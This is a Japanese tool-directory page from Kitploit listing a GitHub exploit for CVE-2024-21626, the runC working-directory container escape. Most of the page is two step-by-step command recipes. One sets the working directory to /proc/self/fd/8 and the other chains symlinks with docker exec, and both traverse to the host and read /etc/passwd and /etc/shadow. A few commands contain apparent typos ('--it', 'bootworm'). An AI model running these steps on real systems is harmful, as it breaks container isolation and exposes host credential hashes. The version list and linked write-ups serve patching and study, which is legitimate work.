Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21626 | Kitploit
ツール/GitHubGitHub/flojboj/cve-2024-21626
特権昇格コンテナセキュリティ脆弱性分析エクスプロイトクラウドセキュリティコンテナエスケープ
GitHubflojboj/cve-2024-21626

CVE-2024-21626

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-21626

エクスプロイト (作業ディレクトリ)

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

  • 重要なのは -w /proc/self/fd/8 を指定することです\
  • コンテナ内で cat ../../../../../../../../../etc/passwd を実行して、ホストのファイルシステムにアクセスします

エクスプロイト (シンボリックリンク)

  1. docker run --name cve-2024-21626 --rm --it debian:bootworm
  2. コンテナ内 - ln -sf /proc/self/fd/7/ /foo
  3. コンテナ内 - ln -sf /proc/self/fd/8/ /bar
  4. docker exec -it -w /bar cve-2024-21626 sleep 120
  5. コンテナ内 - ls -F /proc
  6. コンテナ内 - cat /proc/9/cmdline (sleep コマンドの PID を見つけます)
  7. コンテナ内 - cat /proc/9/cwd/../../../../../etc/shadow

影響を受けるバージョン

  • runC: >= 1.0.0-rc93 かつ <= 1.1.11。
  • containerd: >= 1.4.7 かつ <= 1.6.27、>= 1.7.0 かつ <= 1.7.12。
  • Docker: 25.0.2 で修正済み

出典

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626

ツールをダウンロード